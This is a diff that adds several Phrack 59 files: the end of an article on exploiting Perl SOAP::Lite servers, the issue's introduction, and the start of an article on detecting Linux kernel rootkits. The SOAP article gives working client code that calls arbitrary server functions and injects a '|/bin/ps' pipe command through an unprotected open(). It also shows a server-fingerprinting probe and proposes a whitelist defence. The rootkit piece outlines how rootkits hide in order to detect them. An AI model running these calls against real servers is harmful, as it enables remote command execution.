+banking-application in C++ using CORBA, it worked that way ;-). This is
+also true for SOAP technology, as I will explain a few lines later,
+(indeed, I do not care much about SOAP specification, but on the specific
+implemenatations) but this time we may send function and object-names as
+strings and we will see registering objects does not make the whole thing
+secure as it is expected to be.
+
+
+--[ 2. why Perl
+
+  I will focus on Perl implementations of SOAP because Perl has the special
+capability to call functions indirectly:
+
+
+#!/usr/bin/perl -w
+
+use POSIX;
+
+sub AUTOLOAD
+{
+        print "AUTOLOAD: called $AUTOLOAD(@_)\n";
+}
+
+
+sub func1
+{
+        print "called func1(@_)\n";
+}
+
+
+$name = "POSIX::system";
+
+$name->("/usr/bin/id");
+
+
+  Isn't that nice, we can specify at runtime which function is called via
+$name, POSIX::system in this case. Every unknown function you try to invoke
+i.e. POSIX::nonexisiting will trigger the AUTOLOAD subroutine which is a
+special gift from Perl. That way, you may load unloaded stuff at runtime
+when you notice that a function-call does not 'resolve'. Things are even
+better, because indirect function-calls also work fine with tainted data!
+
+
+#!/usr/bin/perl -w -T
+
+use POSIX;
+
+$ENV{PATH}="/usr/bin";
+$ENV{ENV}="";
+
+sub AUTOLOAD
+{
+	print "AUTOLOAD: called $AUTOLOAD(@_)\n";
+}
+
+
+sub func1
+{
+	print "called func1(@_)\n";
+}
+
+for (;;) {
+	print "Enter function-name: ";
+	$name = <STDIN>; chop $name;
+	print "Enter argument: ";
+	$arg = <STDIN>; chop $arg;
+	$name->($arg);
+}
+
+
+Giving "func1" and "that" as input will call
+
+       func1("that");
+
+even when in tainted mode. Though, it breaks with "POSIX::system" and
+"/bin/sh" because tainted data would be passed to CORE::system() function
+at the end which is forbidden. AUTOLOADing also works with tainted data.
+
+Let's just write that to our Notitzblock:
+
+  'Perl allows functions to be called indirectly, no matter
+   whether it is in tainted mode or not and the name/argument
+   of that function is retrieved from outside or not.'
+
+
+--[ 3. How things work
+
+  Lets now start right away with a Demo-program that uses SOAP::Lite
+[soaplite] to show what XML-RPC means:
+
+#!/usr/bin/perl -w
+
+use SOAP::Transport::HTTP;
+
+$daemon = SOAP::Transport::HTTP::Daemon
+    -> new (LocalPort => 8081)
+    -> dispatch_to('Demo');
+
+print "Contact to SOAP server at ", $daemon->url, "\n";
+$daemon->handle;
+
+sub authenticated
+{
+        return "Hi @_, you are authenticated now!";
+}
+
+package Demo;
+
+sub callme
+{
+        return "called callme";
+}
+
+
+  Ok. That was basicly taken from a How-to-use-SOAP guide from [soaplite].
+What you do here is starting a small HTTP-server which listens on port 8081
+and delegates the XML-RPC's to the package 'Demo'. That way, clients may
+call the callme() function remotely. HTTP is used here, but SOAP works
+protocol-independant, so you may use SMTP or whatever here - there are lots
+of modules shipped with SOAP::Lite. Calling a function basicly works by
+POSTing a XML-document to this server now. Here is a small client calling
+the offered function "callme()":
+
+#!/usr/bin/perl -w
+
+use SOAP::Lite;
+
+my $soap = new SOAP::Lite;
+
+# when using HTTP::Daemon, build client like this
+if (1) {
+	$soap->uri('http://1.2.3.4/Demo');
+	$soap->proxy('http://1.2.3.4:8081/');
+} else {
+	# if SOAP server is CGI, call like this
+	$soap->uri('http://1.2.3.4/Demo');
+	$soap->proxy('http://1.2.3.4/cgi-bin/soap.cgi');
+}
+
+print $soap->callme()->result();
+
+  proxy() allows you to specify which server to contact for the
+remote-service. It's not an HTTP-proxy as you know them from usual web
+stuff. uri() is used to distinguish between the classes the server offers
+(coz he may offer more than one). You can see it later in the HTTP-header
+sent to the server in the SOAPAction field. As you see, CGI scripts may be
+used to offer the service, but thats slower than HTTP::Daemon, so we do not
+discuss it here further (it's the same exploiting technique anyways...).
+
+And thats it! Isnt that nice? RPC can't be easier. The
+
+	$soap->callme()
+
+is translated by SOAP::Lite's AUTOLOADer into a
+$soap->call("callme"); functioncall which produces the
+following XML-document then sent to remote port 8081:
+(HTTP-header stripped, output formatted)
+
+<?xml version="1.0" encoding="UTF-8"?>
+<SOAP-ENV:Envelope xmlns:
+ SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+ SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
+ xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+ xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
+ xmlns:xsd="http://www.w3.org/1999/XMLSchema">
+    <SOAP-ENV:Body>
+        <namesp1:callme xmlns:namesp1="http://1.2.3.4/Demo"/>
+    </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+
+  Just to show you that the functionname is passed to remote-side as
+string. Got an idea now where we will go today? :-) To make things complete
+here's the result:
+
+
+<?xml version="1.0" encoding="UTF-8"?>
+<SOAP-ENV:Envelope xmlns:
+ SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+ SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
+ xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+ xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
+ xmlns:xsd="http://www.w3.org/1999/XMLSchema">
+    <SOAP-ENV:Body>
+        <namesp7:callmeResponse xmlns:namesp7="http://1.2.3.4/Demo">
+            <s-gensym35 xsi:type="xsd:string">
+                called callme
+            </s-gensym35>
+        </namesp7:callmeResponse>
+    </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+  Sucess. I am not going to explain that, as it's first not further of
+interest and second the bookstore where I ordered a book on SOAP did not
+send me the book yet.
+
+
+--[ 4. How things break
+
+  Why not trying to call other functions which do not belong to the
+package? I guess main::authenticated() would be a nice target.
+
+#!/usr/bin/perl -w
+
+use SOAP::Lite;
+
+my $soap = new SOAP::Lite;
+
+# when using HTTP::Daemon, build client like so
+if (1) {
+        $soap->uri('http://1.2.3.4/Demo');
+        $soap->proxy('http://1.2.3.4:8081/');
+} else {
+        # if SOAP server is CGI, call like so
+        $soap->uri('http://1.2.3.4/Demo');
+        $soap->proxy('http://1.2.3.4/cgi-bin/soap.cgi');
+}
+
+print $soap->call("X:main::authenticated" => "me")->result();
+
+
+(Do not ask for code-dup! :-)
+
+Running against the server seen above:
+
+stealth@linux:SOAP> ./c.pl
+Hi Demo me, you are authenticated now!stealth@linux:SOAP>
+
+  Wow! "Demo" and "me" are both arguments to authenticated().
+Thats because of how SOAPLite works:
+
+...
+$class->$method_name(SOAP::Server::Object->objects(@parameters))
+...
+
+  The three dots before the method-call parse the XML-document, retrieving
+class-name method-uri and method-name from it. Actually,
+
+Demo->main::authenticated("me");
+
+is executed by means of our client-request. That yields 'Demo' in @_. That's
+aready the most problematic part of SOAP-implemenatations in Perl. It
+allows you to call any function on (in case of SOAP::Lite) any package.
+
+  We used main:: in this example but it might be POSIX::system() too. There
+are other SOAP modules than SOAP::Lite which we could use here, but they also
+suffer on the same problem. Even when you are not able to specify the
+class-name, that is the SOAP implementation has
+
+sub handler
+{
+        # Dave Developer: we are safe, restricting
+        # access to Calculator package
+        Calculator->$method($args);
+        ...
+}
+
+
+you are able to 'breakout' of the package Calculator by giving the full
+package-name to $method (main::authenticated in above case). It is
+something like *package reverse traversal*. That's the whole point. Again,
+this will work in tainted mode too! A note on SOAP-namespaces: You have
+probably seen that we sent indeed 'X:main::authenticated' (prepended 'X:').
+Do not ask why, but there is a prefix needed in SOAP::Lite case, otherwise
+the remote XML-Parser will complain. On the other hand another SOAP module
+required to have i.e. POSIX as namespace and system as method which
+assembled to POSIX::system on the other end. The XML-document generated by
+that module produced somehow wrong package::method invokations, so I had to
+handle that with raw port 80/HTTP requests by myself. Seems that either I
+got namespace-handling wrong or the module parsing was broken. (Probably
+first case, I said the book did not arrived yet, no? :-)
+
+  Hm. I just remember perl has some nice tricks which are possible via
+open(). Let's see whether we can find some. My requires-script shows me that
+SOAP::Transport::HTTP requires HTTP::Daemon (via 'new' call that is invoked
+by the server, so it's available at runtime). Let's just look at HTTP::Daemon
+package:
+
+...
+package HTTP::Daemon::ClientConn;
+...
+sub send_file
+{
+    my($self, $file) = @_;
+    my $opened = 0;
+    if (!ref($file)) {
+        local(*F);
+        open(F, $file) || return undef;
+...
+
+  Ayeee! An unprotected open() call. To the client we wrote above, add
+
+$soap->call("X:HTTP::Daemon::ClientConn::send_file" => "|/bin/ps");
+
+which will call Demo->HTTP::Daemon::ClientConn::send_file("|/bin/ps");
+which is HTTP::Daemon::ClientConn::send_file(Demo, "|/bin/ps"); where only
+the second argument is of interest ($file for the open-call :-).
+
+  OK. I think now you have got an idea of what's going on here, even when
+the open() call would not be there, it's still dangerous enough as we may
+call *any*, let me repeat, *any* function in the Perl-daemon that is
+availabe at runtime (either in main-package or a package that is 'use'ed
+or 'require'd, except CORE which is not accessible).
+
+
+--[ 5. Tritt ein, bring Glueck herein. 
+
+  It might be of interest to detect whether on a given port a SOAP-Lite
+server is running. Nothing easier than this:
+
+stealth@linux:SOAP> telnet 127.0.0.1 32887
+Trying 127.0.0.1...
+Connected to 127.0.0.1.
+Escape character is '^]'.
+POST /x.pl / HTTP 1.1
+<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope
+xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
+xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/1999/XMLSchema"><SOAP-ENV:Body>
+<SOAP-ENV:Fault><faultcode
+xsi:type="xsd:string">SOAP-ENV:Client</faultcode><faultstring
+xsi:type="xsd:string">Application failed during request deserialization:
+no element found at line 1, column 0, byte -1 at
+/usr/lib/perl5/site_perl/5.6.1/i586-linux/XML/Parser.pm line 185
+</faultstring><faultactor
+xsi:type="xsd:string">http://linux:32887/</faultactor></SOAP-ENV:Fault>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>Connection
+closed by foreign host.
+
+
+  As you see, SOAP-Lite is very verbose in its error-messages. Important
+line is
+
+/usr/lib/perl5/site_perl/5.6.1/i586-linux/XML/Parser.pm
+
+which tells us that Perl is used, and that's it.
+
+  The classnames are usually described elsewhere to give programmers of the
+clients all necessary information. Very often the site that runs the SOAP
+service describes on their website how its interferred with. However, if
+SOAP becomes widespread one day its probably needed to find better scanning
+techniques.
+
+
+--[ 6. No trespassing
+
+  It is very interesting that people think security is when they use HTTPS
+instead of HTTP. I have seen 'secure' SOAP servers which just used HTTPS
+as underlying protocol and were declared as 'secure servers'.
+
+  So, how to protect? Difficult. The -T switch to force tainted mode works
+against direct shell-escapes but being able to call any internal daemon
+function is bad enough. Maybe the package-qualifiers "::" should be
+stripped. If you allow them it's like allowing ".." in pathnames which leads
+to reverse traversal (there are better ways to protect against reverse
+traversal than stripping "..", though) in some cases. Tainting the
+functionname that comes via the socket will disallow _any_ RPC.
+
+  A way might be to put all allowed classes and function-names into a hash
+and look whether the received string is contained there. Frontier XML-RPC
+module for Perl does it that way, it has a hash of methods it allows like
+
+my %funcs = ('callme' => \&sub1);
+
+where you may only call 'callme' function. You can try to call other
+functions until your face turns into green, you won't suceed.
+
+  To be fair, I must admit that the SOAP specification [SOAP] explicitely
+says it does not cover security-releated stuff. Some companies published
+papers on SOAP security right when I was exploiting my test-servers.
+Though, they are almost all releated to encryption and signing topics, just
+a few cover access-control such as [big-blue].
+
+  This is not just a Perl issue AFAIK, because other languages also allow
+indirect calling of functions, such as JAVA or PHP. :-) I did not look at
+JAVA or CORBA for Perl but I would not be surprised if similar problems
+exist there too.
+
+
+--[ 7. References
+
+[soaplite] The SOAP::Lite implementation for Perl
+http://www.soaplite.com
+I tested SOAP::Lite 0.51 and SOAP 0.28 for Perl.
+
+[] A list of some sites who offer XML-RPC service, just to
+show you it is used at all:
+http://www.xmlrpc.com/directory/1568/services
+
+[] Mailinglists, links, docu etc. on SOAP:
+http://soapware.org
+
+[SOAP] SOAP 1.1 specification
+http://www.w3.org/TR/2000/NOTE-SOAP-20000508/
+
+[big-blue] SOAP security whitepaper
+http://www.trl.ibm.com/projects/xml/soap/wp/wp.html
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/1.txt b/phrack59/1.txt
new file mode 100644
index 0000000..1ed361d
--- /dev/null
+++ b/phrack59/1.txt
@@ -0,0 +1,217 @@
+C:\>type FILE_ID.DIZ
+
+                                ==Phrack Inc.==
+
+                   Volume 0x0b, Issue 0x3b, Phile #0x01 of 0x12
+
+[-]==========================================================================[-]
+         , ,,,
+          :#'  `,   ,,                               ,,
+          ##    : ,#'                              ,#'
+ __       $#,,#' ,#'     '#,:#$#.   ,,      ,,,   ,#'  ,'
+/_/l     ,#'     #$'`#,   :#   '# .#  #;  .#'  `  #$#;`
+: : :   ,#'      #:  '#   $#      #'  '#  ##.     #: '#
+ ; ; ; ''       ,#'   ', ,:'      "#,,$#,.'#:.,' ,#'   ',  _/_/_/_/   _/_/_/_/
+  : : :                                                   _/         _/    _/
+   L ; ;  __.-._.-+.                                     _/_/_/_/   _/_/_/_/
+  /."^.:.L.' .^-.  \`.                                        _/_/       _/
+ :`.`. \"/\ /.-. `. \ \                                      _/_/       _/
+ ;\ \ ` ;-.y(_.-\  \ `.`.                               _/_/_/_/   _/_/_/
+ :   _. ;;  `    \  \. `-\
+  \ T :: :=,   ,=^\  \"-._;          __..------.._
+  /;:-'; ;<o\  <o> `._L.--^.     .-""-.`.   \     ""--..
+ : :_.': :           ;/     \   /      \ \   ;          ""--._
+ ;  T   \ \  s      /:.---.  ;_/    `-._; ;  :     ______    \"-.      ___
+:   :\   \ `.-=^" .:-"    _\   \_.      : :  _:.--".-"  .T"---:-.""--""\  ""-.
+;    \\   "-.\__.:'      /-'. ; ;    _. ; ;  /   -'    '    .- \        ;     "-
+:     ;\     `..'      .'    \: ;      / / .'               )   ;  __  /        
+ ;      `,     \    .-"       ;/"---" /.' /                 `- /"""  ""---""""--
+ :    .-" `.      .'.-\      / ""----""""^-.._              .-"  bug
+  \_.'      "._.-"-..-'`-..-'                 ""--..__..--""
+
+[-]==========================================================================[-]
+
+What happend since p58?
+
+Summercon took place (kudos to louis)! We put some pics online at
+http://www.phrack.org/summercon2002 for those who missed it.
+
+DMCA knocked down some websites, forced google to censor parts of their
+contents and continues to deny, forbid and restrict access to certain
+information. Free and unmodified information becomes rare and one day we
+might wake up and dont even know what kind of information we missed. Shame
+and pity on everyone living in chains in the "free" countries where the
+DMCA law applies. (-> PWN).
+
+We have changed our release policy (http://www.phrack.org/release). For the
+last 15 years PHRACK has been released to anyone simultaneously. These days
+PHRACK is also read by individuals, companies and agencies who do not value
+the magazine and the authors (under DMCA, PHRACK might even be forbidden).
+Research is free, the magazine is free, but now the phrack approval and
+review process provides it free to the contributing authors 2 weeks
+earlier.
+
+PHRACK 59 will be released in 3 steps:
+
+2002-07-13: Limited release to contributing authors and volunteer reviewers.
+2002-07-19: PHRACK 59 Release Candidate 1 is privately release to a larger
+            audience for initial feed-back and review. (Not expected to
+	    stay private for long...).
+            http://www.phrack.org/gogetit/phrack59.tar.gz.
+2002-07-28: Public release on http://www.phrack.org main page for everyone
+            who missed the release on the 19th.
+
+There might be some confusion about where to get PHRACK and how to get in
+contact with the Phrack Staff: We do _not_ chill on #phrack/efnet. That
+channel has been left alone for nearly 3 years. Those who know us, know
+where to find us. All others should contact us by email (PGP key is
+attached). None of us would every confirm or show off his involvement in
+PHRACK - only snobs do - watch out and dont trust strangers.  There is only
+one official distribution side:
+
+     [#][#][#]     http://www.phrack.org      [#][#][#]
+
+
+We got contacted by the very old ones: readers, authors and Editors in
+Chief's from 10 and more years ago. Thanks so far to everyone for the
+valueable discussions on knights@lists.phrack.org. This is a call to
+anyone who wants to meet some friends 'from the old days', or who wants to
+organize future events and meetings together: Send an email to
+phrackstaff@phrack.org and we will put you on.
+
+This issue comes with a goodie - check out phrack_tshirt_logo.png. We got
+in contact with a printer and are happy to announce that the PHRACK TSHIRTS
+will be ready for the public PHRACK 59 release. 
+for you, your computer, your family and your dog at DEFCON X and later on
+at http://www.jinxhackwares.com/phrack.
+
+
+|=[ Table of Contents ]=-------------------------------------------------=|
+| 0x01 Introduction                                  Phrack Staff 0x0b kb |
+| 0x02 Loopback                                      Phrack Staff 0x0f kb |
+| 0x03 Linenoise                                     Phrack Staff 0x6b kb |
+| 0x04 Handling the Interrupt Descriptor Table                kad 0x55 kb |
+| 0x05 Advances in kernel hacking II                      palmers 0x15 kb |
+| 0x06 Defeating Forensic Analysis on Unix              the grugq 0x65 kb |
+| 0x07 Advances in format string exploiting            gera & riq 0x1f kb |
+| 0x08 Runtime process infection                 anonymous author 0x2f kb |
+| 0x09 Bypassing PaX ASLR protection             anonymous author 0x26 kb |
+| 0x0a Execution path analysis: finding kernel rk's J.K.Rutkowski 0x2a kb |
+| 0x0b Cuts like a knife, SSHarp                          stealth 0x0c kb |
+| 0x0c Building ptrace injecting shellcodes      anonymous author 0x17 kb |
+| 0x0d Linux/390 shellcode development           johnny cyberpunk 0x14 kb |
+| 0x0e Writing linux kernel keylogger                          rd 0x29 kb |
+| 0x0f Cryptographic random number generators           DrMungkee 0x2d kb |
+| 0x10 Playing with windows /dev/(k)mem                 crazylord 0x42 kb |
+| 0x11 Phrack World News                             Phrack Staff 0x18 kb |
+| 0x12 Phrack magazine extraction utility            Phrack Staff 0x15 kb |
+|=------------------------------------------------------------=[ 0x2EE kb |
+
+Shoutz:
+solar designer               : respect, strength & honor!
+FozZy, brotha                : 1OO% kewl logo (see phrack_tshirt.png)
+sh1ft33 & j0hn               : phrack ghostwriterz
+
+  The latest, and all previous, phrack issues are available online at
+http://www.phrack.org. Readers without web access can subscribe to the
+phrack-distrib mailinglist. Every new phrack is sent as email attachment
+to this list. Every new phrack issue (without the attachment) is announced
+on the announcement mailinglist.
+
+To subscribe to the announcement mailinglist:
+$ mail announcement-subscribe@lists.phrack.org < /dev/null
+
+To subscribe to the distribution mailinglist:
+$ mail distrib-subscribe@lists.phrack.org < /dev/null
+
+To retrieve older issues (must subscribe first):
+$ mail distrib-index@lists.phrack.org < /dev/null
+$ mail distrib-get.<n>@lists.phrack.org < /dev/null
+where n indicated the phrack issue [1..58].
+
+
+Enjoy the magazine!
+
+Phrack Magazine Vol 10 Number 59, Build 2, July 28, 2002. ISSN 1068-1035
+Contents Copyright (c) 2001 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. 
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : pwn@phrack.org
+
+  We have some agressive /dev/null-style mail filter running. We do reply
+to every serious email. If you did not get a reply, then your mail was 
+probably not worth an answer or was caught by our mailfilter. Make sure 
+your mail has a non-implicit destination, one recipient, a non-empty 
+subject field, and does not contain any html code and is 100% 7bit clean
+pure ascii.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+mQGiBD03YTYRBADYg6kOTnjEfrMANEGmoTLqxRZdfxGpvaU5MHPq+XHvuFAWHBm2
+xB/9ZcRt4XIXw0OTL441ixL6fvGPNxjrRmAUtXSWrElGJ5lTj7VdJmdt/DbehzGb
+NXekehG/r6KLHX0PqNzcr84sY6/GrZUiNZftYA/eUWDB7EjEmkBIMs3bnwCg3KRb
+96G68Zc+T4ebUrV5/dkYwFUEAMgSGJpdy8yBWaFUsGOsGkrZZfdf6tRA+GGOnqjS
+Lh094L8iuTfbxr7zO4E5+uToantAl56fHhnEy7hKJxuQdW1C0GKktUDhGltUxrob
+zsNdN6cBprUT7//QgdOlm3nE2E5myozhhMxLMjjFl1mNo1YrNUEU4tYWm/Zvg9OF
+Te8TBADS4oafB6pT9BhGOWhoED1bQRkk/KdHuBMrgwK8vb/e36p6KMj8xBVJNglY
+JtIn6Iv14z8PtO62SEzlcgdsieoVncztQgLIrvCN+vKjv8jEGFtTmIhx6f/VC7pX
+oLX2419rePYaXCPVhw3xDN2CVahUD9jTkFE2eOSFiWJ7DqUsIrQkcGhyYWNrc3Rh
+ZmYgPHBocmFja3N0YWZmQHBocmFjay5vcmc+iFcEExECABcFAj03YTYFCwcKAwQD
+FQMCAxYCAQIXgAAKCRB73vey7F3HClWRAJ4qxMAMESfFb2Bbi+rAb0JS4LnSYwCZ
+AWI6ndU+sWEs/rdD78yydjPKW9q5Ag0EPTdhThAIAJNlf1QKtz715HIWA6G1CfKb
+ukVyWVLnP91C1HRspi5haRdyqXbOUulck7A8XrZRtDUmvMGMO8ZguEjioXdyvYdC
+36LUW8QXQM9BzJd76uUl/neBwNaWCHyiUqEijzkKO8yoYrLHkjref48yBF7nbgOl
+i1y3QOyDGUT/sEdjE5lzHqVtDxKH9B8crVkr/O2GEyr/zRu1Z2L5TjZNcQO988Hy
+CyBdDVsCBwUkdrm/oyqnSiypcGzumD4pYzmquUw1EYJOVEO+WeLAOrfhd15oBZMp
+QlQ/MOfc0rvS27YhKKFAHhSchSFLEppy/La6wzU+CW4iIcDMny5xw1wNv3vGrScA
+AwUH/jAo4KbOYm6Brdvq5zLcEvhDTKf6WcTLaTbdx4GEa8Sj4B5a2A/ulycZT6Wu
+D480xT8me0H4LKl2j7lzhJwzG9HRp846gKrPgj7GVcAaTtsXgwJu6Q7fH74PCrOt
+GEyvJw+hRiQCTHUC22FUAx6SHZ5KzwMs3W8QnNUbRBfbd1hPMaEJpUeBm/jeXSm4
+2JLOd9QjJu3fUIOzGj+G6MWvi7b49h/g0fH3M/LF5mPJfo7exaElXwk1ohyPjeb8
+s11m348C4JqmFKijAyuQ9vfS8cdcsYUoCrWQw/ZWUIYSoKJd0poVWaHQwuAWuSFS
+4C8wUicFDUkG6+f5b7wNjfW3hf2IRgQYEQIABgUCPTdhTgAKCRB73vey7F3HCq5e
+AJ4+jaPMQEbsmMfa94kJeAODE0XgXgCfbvismsWSu354IBL37BtyVg9cxAo=
+=9kWD
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/10.txt b/phrack59/10.txt
new file mode 100644
index 0000000..49cba3f
--- /dev/null
+++ b/phrack59/10.txt
@@ -0,0 +1,1273 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0a of 0x12
+
+
+|=------=[ Execution path analysis: finding kernel based rootkits ]=-----=|
+|=-----------------------------------------------------------------------=|
+|=----------=[ Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl> ]=----------=|
+
+
+--[ Introduction
+
+Over the years mankind has developed many techniques for masking presence
+of the attacker in the hacked system. In order to stay invisible modern
+backdoors modify kernel structures and code, causing that nobody can trust
+the kernel. Nobody, including IDS tools...
+
+In the article I will present a technique based on counting executed
+instructions in some system calls, which can be used to detect various
+kernel rootkits. This includes programs like SucKIT or prrf (see [SUKT01]
+and [PALM01]) which do not modify syscall table. I will focus on Linux
+kernel 2.4, running on Intel 32-bit Family processor (ia32). 
+
+Also at the end of the article the PatchFinder source code is included - a
+proof of concept for described technique.
+
+I am not going to explain how to write a kernel rootkit. For details I send
+reader to the references. However I briefly characterize known techniques
+so their resistance to presented detection method can be described.
+
+--[ Background
+
+Lets take a quick look at typical kernel rootkits. Such programs must solve
+two problems: find a way to get into the kernel and modify the kernel in a
+smart way. On Linux the first task can be achieved by using Loadable Kernel
+Modules (LKM) or /dev/kmem device.
+
+----[ getting into the kernel
+
+Using LKM is the easiest and most elegant way to modify the running kernel.
+It was probably first discussed by halflife in [HALF97].  There are many
+popular backdoors which use LKM (see [KNAR01], [ADOR01], [PALM01]). However
+this technique has a weak point - LKM can be disabled on some systems.
+
+When we do not have LKM support we can use technique, developed by Silvio
+Cesare, which uses /dev/kmem to access directly kernel memory (see
+[SILV98]).  There is no easy work-around for this method, since patching
+do_write_mem() function is not sufficient, as it was recently showed by
+Guillaume Pelat (see [MMAP02]). 
+
+----[ modifying syscall table
+
+Providing that we can write to kernel memory, we face the problem what to
+modify.
+
+Many rootkits modifies syscall table in order to redirect some useful
+system calls like sys_read(), sys_write(), sys_getdents(), etc... For
+details see [HALF97] and source code of one of the popular rootkit
+([KNAR01], [ADOR01]).  However this method can be traced, by simply
+comparing current syscall table with the original one, saved after kernel
+creation.
+
+When there is LKM mechanism enabled in the system, we can use simple
+module, which read syscall table (directly accessing kernel memory) and
+then puts it into the userland (due to /proc filesystem for example).
+
+Unfortunately when LKM is not supported we can not read kernel memory
+reliably, since we use sys_read() or sys_mmap() to read or mmap /dev/kmem.
+We can not be sure that malicious code we are trying to find, does not
+alter sys_read()/sys_mmap() system calls.
+
+----[ modifying kernel code
+
+Instead of changing pointers in the syscall table, malicious program can
+alter some code in the kernel, like system_call function. In this case
+analysis of syscall table would not show anything. Therefore we would like
+to scan scan kernel memory and check whether the code area has been
+modified.
+
+It is simple to implement if there is LKM enabled. However, if we do not
+have LKM support, we must access kernel memory through /dev/kmem and again
+we face the problem of unreliable sys_read()/sys_mmap().
+
+SucKIT (see [SUKT01]) is an example of rootkit which uses /dev/kmem to
+access kernel and then changing system_call code, not touching original
+syscall table.  Although SucKIT does not alter sys_read() and sys_mmap()
+behavior, this feature can be added, making it impossible to detect such
+backdoor by conventional techniques (i.e. memory scanning through
+/dev/kmem)...
+
+----[ modifying other pointers
+
+In the previous issue of Phrack palmers presented nice idea of changing
+some pointers in /proc filesystem (see [PALM01]). Again if our system has
+LKM enabled we can, at least theoretically, check all the kernel structures
+and find out if somebody has changed some pointers. However it could be
+difficult in implementation, because we have to foresee all potential
+places the rootkit may exploit.
+
+With LKM disabled, we face the same problem as explained in the above
+paragraphs.
+
+--[ Execution path analysis (stepping the kernel)
+
+As we can see, detection of kernel rootkits is not trivial. Of course if we
+have LKM support enabled we can, theoretically, scan the whole kernel
+memory and find the intruder. However we must be very careful in deciding
+what to look for. Differences in the code indicates of course that
+something is wrong.  Although change of some data should also be treated as
+alarm (see prrf.o again), modifications of others structures might be
+result of normal kernel daily tasks.
+
+The things become even more complicated when we disable LKM on our kernel
+(to be more secure:)). Then, as I have just said, we can not read kernel
+memory reliable, because we are not sure that sys_read() returns real bytes
+(so we can't read /dev/kmem). We are also not sure that sys_mmap2() fills
+mapped pages with correct bytes...
+
+Lets try from other side. If somebody modified some kernel functions, it is
+very probable, that the number of instructions executed during some system
+calls (for e.g. sys_getdents() in case an attacker is trying to hide files)
+will be different than in the original kernel. Indeed, malicious code  must
+perform some additional actions, like cutting off secret filenames, before
+returns results to userland. This implies execution of many more
+instructions compared to not infected system. We can measure this
+difference!
+
+----[ hardware stepper 
+
+The ia32 processor, can be told to work in the single-step mode.  This is
+achieved by setting the TF bit (mask 0x100) in EFLAGS register.  In this
+mode processor will generate a debug exception (#DB) after every execution
+of the instruction. 
+
+What is happened when the #DB exception is generated? Processor stops
+execution of the current process and calls debug exception handler. The #DB
+exception handler is described by trap gate at interrupt vector 1.
+
+In Intel's processors there is an array of 256 gates, each describing
+handler for a specific interrupt vector (this is probably the Intel's
+secret why they call this scalar numbers 'vectors'...).
+
+For example at position 0x80 there is a gate which tells where is located
+handler of the 0x80 trap - the Linux system call. As we all know it is
+generated by the process by means of the 'int 0x80' instruction. This array
+of 256 gates is called Interrupt Descriptor Table (IDT) and is pointed by
+the idtr register. 
+
+In Linux kernel, you can find this handler in arch/i386/kernel/entry.S
+file.  It is called 'debug'. As you can see, after some not interesting
+operations it calls do_debug() function, which is defined in
+arch/i386/kernel/traps.c.
+
+Because #DB exception is devoted not only for single stepping but to many
+other debugging activities, the do_debug() function is a little bit
+complex.  However it does not matter for us. The only thing we are
+interested in, is that after detecting the #DB exception was caused by
+single stepping (TF bit) a SIGTRAP signal is sent to traced process. The
+process might catch this signal. So, it looks that we can do something like
+this, in our userland program:
+
+	volatile int traps = 0;
+
+	int trap () {
+		traps++;
+	}
+
+	main () {
+		...
+		signal (SIGTRAP, sigtrap);
+
+		xor_eflags (0x100);
+		/* call syscall we want to test */
+		read (fd, buff, sizeof (buff));
+		xor_eflags (0x100);
+
+		printf ("testing syscall takes %d instruction\n", traps);
+	}
+
+It looks simple and elegant. However has one disadvantage - it does not
+work as we want. In variable traps we will find only the number of
+instructions executed in userland. As we all know, read() is only a wrapper
+to 'int 0x80' instruction, which causes the processor calls 0x80 exception
+handler. Unfortunately the processor clears TF flag when executing 'int x'
+(and this instruction is causing privilege level changing).
+
+In order to stepping the kernel, we must insert some code into it, which
+will be responsible for setting the TF flag for some processes. The good
+place to insert such code is the beginning of the 'system_call' assembler
